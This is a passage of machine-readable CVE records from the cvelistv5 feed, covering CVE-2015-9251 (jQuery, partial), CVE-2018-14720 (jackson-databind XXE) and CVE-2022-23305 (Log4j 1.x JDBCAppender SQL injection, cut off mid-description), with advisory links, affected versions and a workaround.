"https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", refsource: "MISC", url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", refsource: "MISC", url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { name: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", refsource: "MISC", url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: 
"https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.tenable.com/security/tns-2019-08", refsource: "CONFIRM", url: "https://www.tenable.com/security/tns-2019-08", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", refsource: "MISC", url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", refsource: "CONFIRM", url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { name: "https://security.netapp.com/advisory/ntap-20210108-0004/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2015-9251", datePublished: "2018-01-18T23:00:00", dateReserved: "2018-01-18T00:00:00", dateUpdated: "2024-08-06T08:43:41.697Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14720
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.593Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. 
FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: 
"https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ 
"mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-08-31T13:06:09", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: 
"https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. 
FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: 
"DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: 
"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14720", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: 
"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. 
FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: 
"https://seclists.org/bugtraq/2019/May/68", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: 
"REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14720", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.593Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2022-23305
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| https://logging.apache.org/log4j/1.2/index.html | x_refsource_MISC |
| https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y | x_refsource_MISC |
| http://www.openwall.com/lists/oss-security/2022/01/18/4 | mailing-list, x_refsource_MLIST |
| https://www.oracle.com/security-alerts/cpuapr2022.html | x_refsource_MISC |
| https://security.netapp.com/advisory/ntap-20220217-0007/ | x_refsource_CONFIRM |
| https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x | Version: 1.2.1 < unspecified; Version: unspecified < 2.0-alpha1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T03:36:20.421Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { name: "[oss-security] 20220118 CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x ", vendor: "Apache Software Foundation", versions: [ { lessThan: "unspecified", status: "affected", version: "1.2.1", versionType: "custom", }, { lessThan: "2.0-alpha1", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Daniel Martin of NCC Group", }, ], descriptions: [ { lang: "en", value: "By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. 
Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], metrics: [ { other: { content: { other: "high", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-89", description: "CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:49:18", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { name: "[oss-security] 20220118 CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { discovery: "UNKNOWN", }, title: "SQL injection in JDBC Appender in Apache Log4j V1", workarounds: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JDBCAppender from their configurations.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2022-23305", STATE: "PUBLIC", TITLE: "SQL injection in JDBC Appender in Apache Log4j V1", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { 
product_name: "Apache Log4j 1.x ", version: { version_data: [ { version_affected: ">=", version_value: "1.2.1", }, { version_affected: "<", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "Daniel Martin of NCC Group", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. 
